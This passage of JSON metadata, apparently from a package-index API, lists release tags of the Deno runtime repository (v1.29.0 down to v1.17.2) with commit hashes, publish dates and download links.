/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/